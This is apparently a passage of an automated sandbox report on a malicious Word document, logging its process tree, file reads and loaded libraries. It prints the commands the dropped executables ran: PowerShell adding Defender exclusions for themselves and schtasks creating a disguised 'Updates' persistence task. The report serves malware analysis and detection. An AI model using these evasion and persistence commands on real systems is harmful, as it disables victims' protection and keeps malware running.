Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....d.......l...............hE.........................s..............".............................			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....d.......l...............tE.........................s..............".............................			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................ .......................(.P.....................t........=................................................................".....			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P............. ................l.........................s..............".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............. ................l.........................s..............4...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P............. ................l.........................s..............".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............. ................l.........................s..............4...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P............. ................l.........................s..............".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............. ................l.........................s..............4...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n............... ................m.........................s..............4.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............. ................m.........................s..............4.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........-m.........................s..............4..... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............. ...............9m.........................s..............4.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P............. ...............Nm.........................s..............".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............. ...............em.........................s..............4...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....wm.........................s..............4.....$.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............. ................m.........................s..............4.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P............. ................m.........................s..............".............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............. ................m.........................s..............4...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............4.....2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............. .......D........m.........................s..............4.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..".....................................(.P............. ................m.........................s..............".....l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............. ................m.........................s..............4...............".............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P............. ................m.........................s..............4.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............. ................n.........................s..............4.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X...............,j.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X................j.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X................j.........................s............................H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X................j.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X................j.........................s............................H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X................j.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n.......x.......X................k.........................s............H...............H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X...............'k.........................s............H...............H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........Wm.........................s............H....... .......H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X..............."n.........................s............H...............H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X...............4n.........................s............................H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X...............@n.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....Sn.........................s............H.......$.......H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X...............`n.........................s............H...............H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X...............rn.........................s............................H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X...............~n.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2.......H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X................n.........................s............H...............H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X...............~o.........................s....................l.......H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X................o.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....x.......X................o.........................s............H...............H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....x.......X................o.........................s............H...............H...............
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................|.4.........E.R.R.O.R.:. ...........,................^......................................(.'.......................4.....
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................|.4.........E.R.R.O.(.P.............,................^..............................................j.................4.....

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: order072724.docx.doc

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {52F5B264-C702-43C6-8445-EB0747C55549} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\gRpkBp.exe C:\Users\user\AppData\Roaming\gRpkBp.exe
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpED3D.tmp"
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Users\user\AppData\Roaming\gRpkBp.exe "C:\Users\user\AppData\Roaming\gRpkBp.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\gRpkBp.exe C:\Users\user\AppData\Roaming\gRpkBp.exe
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpED3D.tmp"
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Users\user\AppData\Roaming\gRpkBp.exe "C:\Users\user\AppData\Roaming\gRpkBp.exe"

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: windowscodecs.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: rpcrtremote.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: ktmw32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: rasman.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: webio.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: credssp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: rpcrtremote.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Section loaded: dnsapi.dll			Jump to behavior
